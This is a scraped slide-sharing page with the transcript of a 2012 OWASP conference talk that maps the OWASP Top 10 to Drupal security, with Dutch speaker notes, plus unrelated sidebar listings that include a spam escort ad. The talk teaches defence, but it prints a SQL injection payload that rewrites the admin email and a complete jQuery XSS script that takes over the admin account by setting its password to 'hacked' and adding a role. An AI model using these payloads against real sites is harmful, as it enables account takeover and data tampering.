From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 

Último (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 

OWASP Top 10 vs Drupal Security Review

  • 1. OWASP Top 10 vs Drupal OWASP Benelux Conference 2012 Erwin Geirnaert: CEO & Application Security Expert
  • 2. Agenda • About me • Drupal Core Security • OWASP Top 10 vs Drupal
  • 4.
  • 5.
  • 6.
  • 7.
  • 9.
  • 10.
  • 11.
  • 12. Automated code review • Checkmarx is a recognized vendor of Source Code Analysis (SCA) • Automated code review of Drupal 6 and Drupal 7 • Only issues identified in the Drupal back- end • Admin access = root access
  • 14. Drupal 6 Most vulnerable pages
  • 17. Drupal 7 Most vulnerable pages
  • 18. Did you see this?
  • 19. Arbitrary PHP code execution • A bug in the installer code was identified that allows an attacker to re-install Drupal using an external database server under certain transient conditions. This could allow the attacker to execute arbitrary PHP code on the original server. • This vulnerability is mitigated by the fact that the re-installation can only be successful if the site's settings.php file or sites directories are writeable by or owned by the webserver user. Configuring the Drupal installation to be owned by a different user than the webserver user (and not to be writeable by the webserver user) is a recommended security best practice. However, in all cases the transient conditions expose information to an attacker who accesses install.php, and therefore this security update should be applied to all Drupal 7 sites. Business logic flaw!!!
  • 20. Did you see this?
  • 22. OWASP Top Ten (2010 Edition) http://www.owasp.org/index.php/Top_10
  • 23. A1 – Injection Injection means… • Tricking an application into including unintended commands in the data sent to an interpreter Interpreters… • Take strings and interpret them as commands • SQL, OS Shell, LDAP, XPath, Hibernate, etc… SQL injection is still quite common • Many applications still susceptible (really don‟t know why) • Even though it‟s usually very simple to avoid Typical Impact • Usually severe. Entire database can usually be read or modified • May also allow full database schema, or account access, or even OS level access
  • 25. A1-Injection • How not to do it db_query("SELECT * FROM {users} WHERE uid = $uid"); • How can this be exploited? $uid = $_GET[„id‟]; //they don‟t pass an integer as expected  hacker requests: drupal.org?id=1;Update {users} SET mail=„malicious@hacker.com‟ WHERE uid = 1; db_query("SELECT * FROM {users} WHERE uid = $uid"); becomes SELECT * FROM {users} WHERE uid = 1;Update {users} SET mail=„malicious@hacker.com‟ WHERE uid = 1;
  • 26. A1-Injection • Prevent injection using Drupal API properly db_query("SELECT * FROM {users} WHERE uid = %d", $uid); • The db_query method does sanitizing for you.
  • 27. A2 – Cross-Site Scripting (XSS) Occurs any time… • Raw data from attacker is sent to an innocent user‟s browser Raw data… • Stored in database • Reflected from web input (form field, hidden field, URL, etc…) • Sent directly into rich JavaScript client Virtually every web application has this problem • Try this in your browser – javascript:alert(document.cookie) Typical Impact • Steal user‟s session, steal sensitive data, rewrite web page, redirect user to phishing or malware site • Most Severe: Install XSS proxy which allows attacker to observe and direct all user‟s behavior on vulnerable site and force user to other sites
  • 28. A2-Cross Site Scripting (XSS) • Where is the bug?
  • 29. A2-Cross Site Scripting (XSS) • How does it happen? print $_GET[„error‟]; • At first sight it looks harmless, right? • WRONG!!! • An actual example of XSS to change users‟ password & change roles.
  • 30. A2-Cross Site Scripting (XSS) • <script> // Test for the presence of jquery. if (typeof jQuery == 'function') { // Fetch a correct token from user/1/edit because we will need it to // successfully submit the user edit form later. // TODO: Include a check to increase the chance that the current user is admin, // which will reduce the number of access denied error messages in the log. jQuery.get(Drupal.settings.basePath + 'user/1/edit', function (data, status) { if (status == 'success') { // Extract the token and other required data var matches = data.match(/name="name" value="([a-zA-Z0-9])"/); var name = matches[1]; var mail = 'greg.knaddison+evilguy@acquia.com'; var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-])"/); var token = matches[1]; var matches = data.match(/name="form_build_id" value="(form-[a-zA-Z0-9_-]*)"/); var build_id = matches[1]; // Post the minimum amount of fields. Other fields get their default values. var payload = { "name": name, "mail": mail, "form_id": 'user_profile_form', http://crackingdrupal.com/blog/gre "form_token": token, build_id : build_id, "pass[pass1]": 'hacked', ggles/update-uid1-password- "pass[pass2]": 'hacked', "roles[3]": 3 javascript-ported-drupal-6x }; jQuery.post(Drupal.settings.basePath + 'user/1/edit', payload); } } ); } </script>
  • 31. A2-Cross Site Scripting (XSS) • If code like before gets executed by a privileged user: GAME OVER
  • 32. A2-Cross Site Scripting (XSS) • How to prevent it? Drupal offers a range of tools: • Filter_xss()  Filters HTML to prevent cross-site-scripting (XSS) vulnerabilities. • Check_Plain() Encodes special characters in a plain-text string for display as HTML. • Check_url()  Strips dangerous protocols from a URI and encodes it for output to HTML.
  • 33. A2-Cross Site Scripting (XSS) • It is more important to think of a proper way of handling data & error messages, rather than mending wounds later. • E.g: Proper error handling drupal_set_message(„An error occured‟, „error‟);
  • 34. A3 – Broken Authentication and Session Management HTTP is a “stateless” protocol • Means credentials have to go with every request • Should use SSL for everything requiring authentication Session management flaws • SESSION ID used to track state since HTTP doesn‟t • and it is just as good as credentials to an attacker • SESSION ID is typically exposed on the network, in browser, in logs, … Beware the side-doors • Change my password, remember my password, forgot my password, secret question, logout, email address, etc… Typical Impact • User accounts compromised or user sessions hijacked
  • 35. A3-Broken Authentication and Session Management
  • 36. A3-Broken Authentication and Session Management • In Drupal user accounts and authentication are managed by Drupal core. • Authentication cookies and a user's name, ID, and password are managed on the server to prevent a user from easily escalating their authorization. • Passwords are NEVER emailed.
  • 37. A3-Broken Authentication and Session Management • User passwords, in Drupal 7, are salted and hashed using an algorithm based on the Portable PHP Password • Hashing Framework and sessions are destroyed upon login and logout.
  • 38. A4 – Insecure Direct Object References How do you protect access to your data? • This is part of enforcing proper “Authorization”, along with A7 – Failure to Restrict URL Access A common mistake … • Only listing the „authorized‟ objects for the current user, or • Hiding the object references in hidden fields • … and then not enforcing these restrictions on the server side • This is called presentation layer access control, and doesn‟t work • Attacker simply tampers with parameter value Typical Impact • Users are able to access unauthorized files or data
  • 39. A4-Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
  • 40. A4-Insecure Direct Object References • Drupal provides, in most cases, a direct reference (node/[id], user/[id], ..) to its entities. • At the moment there is no core solution to prevent direct referencing. There are community contributed modules to obfuscate.
  • 41. A4-Insecure Direct Object References What is the risk? • If you have private pages that aren‟t referenced on your website but aren‟t properly protected, they can still be found simply by crawling node/1, node/2, node/3. etc..
  • 42. A4-Insecure Direct Object References To deal with this: • Ensure proper permissions are configured at all times for content types & pages specifically • Protection against semantic forgery attacks is implemented in Drupal core via the Form API
  • 43. A5 – Cross Site Request Forgery (CSRF) Cross Site Request Forgery • An attack where the victim‟s browser is tricked into issuing a command to a vulnerable web application • Vulnerability is caused by browsers automatically including user authentication data (session ID, IP address, Windows domain credentials, …) with each request Imagine… • What if a hacker could steer your mouse and get you to click on links in your online banking application? • What could they make you do? Typical Impact • Initiate transactions (transfer funds, logout user, close account) • Access sensitive data • Change account details
  • 44. A5-Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim‟s browser to send a forged HTTP request, including the victim‟s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim‟s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
  • 45. A5-Cross Site Request Forgery (CSRF) • Drupal validates user intention in actions using industry standard techniques. Typical actions with side-effects (e.g. delete database objects) are generally conducted with the HTTP POST method. With AJAX you can easily create HTTP POST XmlHTTPRequests Combine this with XSS 
  • 46. A5-Cross Site Request Forgery (CSRF) You can add security tokens to links When you access the path you can check the token validity
  • 47. A5-Cross Site Request Forgery (CSRF) • Drupal's Form API implements unique form tokens to protect against CSRF in POST requests. • Less important actions can leverage the one-time token generation and validation functions of the Form API while still using an HTTP GET request.
  • 48. A6 – Security Misconfiguration Web applications rely on a secure foundation • Everywhere from the OS up through the App Server • Don‟t forget all the libraries you are using!! Is your source code a secret? • Think of all the places your source code goes • Security should not require secret source code CM must extend to all parts of the application • All credentials should change in production Typical Impact • Install backdoor through missing OS or server patch • XSS flaw exploits due to missing application framework patches • Unauthorized access to default accounts, application functionality or data, or unused but accessible functionality due to poor server configuration
  • 49. A6-Security Misconfiguration • Avoid using FTP at all cost (Total Commander is the enemy) • Keep your OS, PHP, SQL server, etc. up to date • Avoid any kind of PHP input, write your own modules instead • SSH access from everywhere? • /user/admin accessible from everywhere?
  • 50. A6-Security Misconfiguration • Drupal guides you fairly well through the configuration of your website when you‟re installing it. • The status report page keeps you up to date on out of date modules or settings that aren‟t correct.
  • 51. A6-Security Misconfiguration • Drupal keeps a list of best practices online that will help you configure your website with optimal security. http://drupal.org/security/secure-configuration
  • 52. A7 – Insecure Cryptographic Storage Storing sensitive data insecurely • Failure to identify all sensitive data • Failure to identify all the places that this sensitive data gets stored • Databases, files, directories, log files, backups, etc. • Failure to properly protect this data in every location Typical Impact • Attackers access or modify confidential or private information • e.g, credit cards, health care records, financial data (yours or your customers) • Attackers extract secrets to use in additional attacks • Company embarrassment, customer dissatisfaction, and loss of trust • Expense of cleaning up the incident, such as forensics, sending apology letters, reissuing thousands of credit cards, providing identity theft insurance • Business gets sued and/or fined
  • 53. A7-Insecure Cryptographic Storage • Many web applications do not properly protect sensitive data, such as credit cards, SSNs, and authentication credentials, with appropriate encryption or hashing. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes.
  • 54. A7-Insecure Cryptographic Storage • Drupal is modeled on the Portable PHP Password Framework • Drupal provides a randomly generated private key for every installation. Modules can use this key to use reversible encryption for sensitive data like credit- card numbers.
  • 55. A8 – Failure to Restrict URL Access How do you protect access to URLs (pages)? • This is part of enforcing proper “authorization”, along with A4 – Insecure Direct Object References A common mistake … • Displaying only authorized links and menu choices • This is called presentation layer access control, and doesn‟t work • Attacker simply forges direct access to „unauthorized‟ pages Typical Impact • Attackers invoke functions and services they‟re not authorized for • Access other user‟s accounts and data • Perform privileged actions
  • 56. A8-Failure to Restrict URL Access • Drupal is a powerful permission-based system which checks permissions for every URL request, even if the URL path is set to allow everyone access.
  • 57. A8-Failure to Restrict URL Access Custom module example /** * Implements hook_permission(). */ function mymodule_permission() { return array( „mymodule_custom_permission' => array( 'title' => t('My module custom permission'), 'description' => t(„A custom permission setting for my module.'), ), ); } /** * Implements hook_menu(). */ function mymodule_menu() { return array( „custom/path/to/mymodule' => array( 'title' => „My module path„, 'page callback' => „mymodule_custom_permission ', 'access arguments' => array('access content'), 'type' => MENU_CALLBACK, ), ); }
  • 58. A8-Failure to Restrict URL Access • In previous example a custom permission was made and a path was defined using this permission for access check. • This setting will create a permission setting which you can assign to every role separatly.
  • 59. A9 – Insufficient Transport Layer Protection Transmitting sensitive data insecurely • Failure to identify all sensitive data • Failure to identify all the places that this sensitive data is sent • On the web, to backend databases, to business partners, internal communications • Failure to properly protect this data in every location Typical Impact • Attackers access or modify confidential or private information • e.g, credit cards, health care records, financial data (yours or your customers) • Attackers extract secrets to use in additional attacks • Company embarrassment, customer dissatisfaction, and loss of trust • Expense of cleaning up the incident • Business gets sued and/or fined
  • 60. A9-Insufficient Transport Layer Protection • Drupal supports the use of SSL when accepting connections and rendering internal links. Drupal provides several options including: – full SSL – no-SSL – mixed-mode SSL
  • 61. A10 – Unvalidated Redirects and Forwards Web application redirects are very common • And frequently include user supplied parameters in the destination URL • If they aren‟t validated, attacker can send victim to a site of their choice Forwards (aka Transfer in .NET) are common too • They internally send the request to a new page in the same application • Sometimes parameters define the target page • If not validated, attacker may be able to use unvalidated forward to bypass authentication or authorization checks Typical Impact • Redirect victim to phishing or malware site • Attacker‟s request is forwarded past security checks, allowing unauthorized function or data access
  • 63. A10-Unvalidated Redirects and Forwards • Internal page redirects cannot be modified to circumvent Drupal's core menu and access control system. This includes form redirects as well as flat url redirects
  • 64. So is Drupal secure? • Core has no typical issues • Built-in validators and filters • Be carefull with custom code! • Be carefull with external modules! • Watch out for business logic flaws!
  • 65. Drupal 8 is coming • Totally different approach • More object-oriented • Symphony framework

Notas do Editor

  1. XSS vulnerability zit hem in de $vocab-&gt;name die niet wordt sanitized, als iemand alert(‘hack’) als naam invult wordt dit uitgevoerd op de front-end. Simpele manier van mitigation = check_plain()
  2. Deze code kan user passwoorden veranderen naar “hacked”.
  3. Hoewel er op veel fora wordt gezegd om de toegang op publieke urls met een access callback die altijd true teruggeeft te doen, is dit toch een beetje tegen de best practise. Er is een volledig geintegreerd permission systeem waar je iedereen rechten kan geven. Verder is er het tweede stuk wat een automatische login is op basis van uid &amp; een hash van de uid, wat ook broken is en door iedereen op elke moment kan worden misbruikt.